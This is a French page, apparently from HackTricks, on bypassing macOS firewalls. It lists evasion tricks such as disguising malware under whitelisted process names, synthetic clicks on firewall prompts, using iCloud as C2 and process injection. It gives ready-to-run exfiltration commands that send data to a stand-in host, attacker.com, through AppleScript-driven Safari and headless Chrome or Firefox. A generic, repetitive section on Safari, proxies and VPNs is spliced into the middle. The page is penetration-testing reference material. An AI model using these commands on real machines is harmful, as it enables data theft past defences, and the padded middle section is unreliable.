7.9 KiB
Contournement des pare-feu macOS
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? Ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
- Découvrez The PEASS Family, notre collection exclusive de NFT
- Obtenez le swag officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.
Techniques trouvées
Les techniques suivantes ont été trouvées et fonctionnent avec certaines applications pare-feu macOS.
Abus des noms de liste blanche
- Par exemple, appeler le logiciel malveillant avec des noms de processus macOS bien connus comme
launchd
Clic synthétique
- Si le pare-feu demande la permission à l'utilisateur, faire en sorte que le logiciel malveillant clique sur Autoriser
Utiliser des binaires signés par Apple
- Comme
curl, mais aussi d'autres commewhois
Domaines Apple bien connus
Le pare-feu peut autoriser les connexions vers des domaines Apple bien connus tels que apple.com ou icloud.com. Et iCloud peut être utilisé comme un C2.
Contournement générique
Quelques idées pour essayer de contourner les pare-feu
Vérifier le trafic autorisé
Connaître le trafic autorisé vous aidera à identifier les domaines potentiellement présents sur la liste blanche ou les applications autorisées à y accéder.
lsof -i TCP -sTCP:ESTABLISHED
Abus de DNS
Les résolutions DNS sont effectuées via l'application signée mdnsreponder, qui sera probablement autorisée à contacter les serveurs DNS.
Via les applications de navigateur
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
{% code overflow="wrap" %}
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
{% endcode %}
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
Contournement des pare-feu macOS
Safari
Safari est le navigateur Web par défaut sur les systèmes d'exploitation macOS. Il est important de comprendre comment il interagit avec les pare-feu pour pouvoir contourner les restrictions de sécurité.
Utilisation de ports autorisés
Les pare-feu peuvent bloquer l'accès à certains ports pour des raisons de sécurité. Cependant, Safari utilise généralement les ports autorisés (tels que le port 80 pour HTTP et le port 443 pour HTTPS) pour se connecter aux sites Web. Par conséquent, il est possible de contourner les pare-feu en utilisant ces ports autorisés pour accéder à des sites Web bloqués.
Utilisation de protocoles autorisés
De la même manière, les pare-feu peuvent bloquer certains protocoles de communication pour des raisons de sécurité. Cependant, Safari utilise généralement des protocoles autorisés tels que HTTP et HTTPS pour se connecter aux sites Web. Par conséquent, il est possible de contourner les pare-feu en utilisant ces protocoles autorisés pour accéder à des sites Web bloqués.
Utilisation de serveurs proxy
Un serveur proxy agit comme un intermédiaire entre votre navigateur et les sites Web que vous visitez. En configurant un serveur proxy, vous pouvez contourner les restrictions de pare-feu en acheminant votre trafic Web via un serveur autorisé. Safari prend en charge la configuration de serveurs proxy, ce qui vous permet de contourner les pare-feu en utilisant cette méthode.
Utilisation de VPN
Un réseau privé virtuel (VPN) crée une connexion sécurisée entre votre ordinateur et un serveur distant. En utilisant un VPN, vous pouvez masquer votre adresse IP réelle et simuler une connexion à partir d'un emplacement différent. Cela peut vous aider à contourner les restrictions de pare-feu en apparaissant comme si vous vous connectiez à partir d'un emplacement autorisé.
Conclusion
Safari est un outil puissant pour contourner les pare-feu sur les systèmes d'exploitation macOS. En utilisant les ports et protocoles autorisés, ainsi que des serveurs proxy ou un VPN, vous pouvez accéder à des sites Web bloqués et contourner les restrictions de sécurité. Cependant, il est important de noter que ces méthodes peuvent être considérées comme des violations des politiques de sécurité et peuvent entraîner des conséquences légales.
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
Via injections de processus
Si vous pouvez injecter du code dans un processus autorisé à se connecter à n'importe quel serveur, vous pouvez contourner les protections du pare-feu :
{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
Références
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? Ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
- Découvrez The PEASS Family, notre collection exclusive de NFT
- Obtenez le swag officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.